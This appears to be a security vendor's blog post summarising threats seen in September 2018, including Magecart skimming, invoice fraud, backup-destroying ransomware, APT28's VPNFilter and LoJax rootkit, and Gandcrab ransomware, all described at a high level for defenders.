Top threats September 2018: veteran criminals like “artisanal” hacking
In September we shook off the beach sand and returned to our professional lives. The criminals, in that sense, aren’t very different from us. Over the summer our Cyber Defense Centers have seen the usual rookie attacks (like PyLocky, a ransomware created in python, and bundled with the interpreter), but we’ve also seen veterans taking an “artisanal” approach too. This trend of rookie criminals doing “old tricks” and veterans going bespoke, defines this month’s top threats blog.
Website skimming & Magecart
Website skimming is the art of appending a few lines of code to a hacked webserver. These lines of code then “scrape” the data from payments, like credit card information. Ticketmaster and British Airways were hit in the UK, as reported on by RiskIQ. While this attack is very interesting, especially if you’re in retail or have on-line channels for business, there is, of course, the prerequisite that the server needs to be hacked first. And how do they do that?
Truth is, it can be done in many ways. From CMS credential theft, to social engineering, vulnerabilities and exploit kits. It’s a number’s game. The criminals go after the infection first and ask questions later. When you infect 100,000 machines, there’s bound to be several dozen interesting ones within enterprises. Website skimming is a new trick in the arsenal.
“Artisanal” hacking and extortion
Over the summer, we increasingly saw veteran criminals search for value in these compromised networks. They do more than Magecart too; in our Cyber Defense Centers we’ve observed “digitally steaming open envelopes”, from the initial infection, performing lateral movement to the CRM (Customer Relations Management) and finding the invoice template. Then they change one small field, the bank account, and substitute it for their money mule account. Which means your customers will pay the invoice to a criminal account instead of yours.
We also saw criminals going after on-line backups and destroying them, before deploying generic ransomware. If you’re denied the recovery process in this way, as a victim there’s not a lot you can do. Veteran criminals understand this and ask for an enterprise ransom. One report mentions that criminals are getting very good at asking for a “Goldilocks” ransom: not too much, not too little, but just right. Apparently, some of the more successful criminals of a few years ago have now turned to this MO.
APT28 still at it
APT28 (or Fancy Bear, Sednit, or whatever; we’re talking about a Russia linked APT group) has been very busy churning out VPN filter modules. Go ahead and reboot those home routers. Even if they’re not likely to target you, you don’t want an APT in your home.
LoJax is an UEFI rootkit, found in the wild, that has been attributed to APT28. The relevance is that achieving persistence before the Operating System kicks in is somewhat of a holy grail in espionage. While there are several ways of doing this out there, this one is potentially powerful, since threat detection in the operating system will likely not work.
Ransomware is alive and kicking
As veteran criminals are moving to bespoke ransomware, rookie criminals seem to be backing down from CryptoJacking and going back to ransomware again. In September a new version of Gandcrab was released among criminal circles, and victims across Europe noticed this soon after. Gandcrab is not particularly interesting, it’s not more or less dangerous than other ones, but it’s interesting to note the unexpected increase of ransomware over summer, as well as rookie criminals still turning to this destructive attack form. We had hoped they’d stick to CryptoJacking, which doesn’t destroy so much and only costs a bunch of CPU cycles.
We’ll release a quick update on the statistics on ransomware versus CryptoJacking later this month.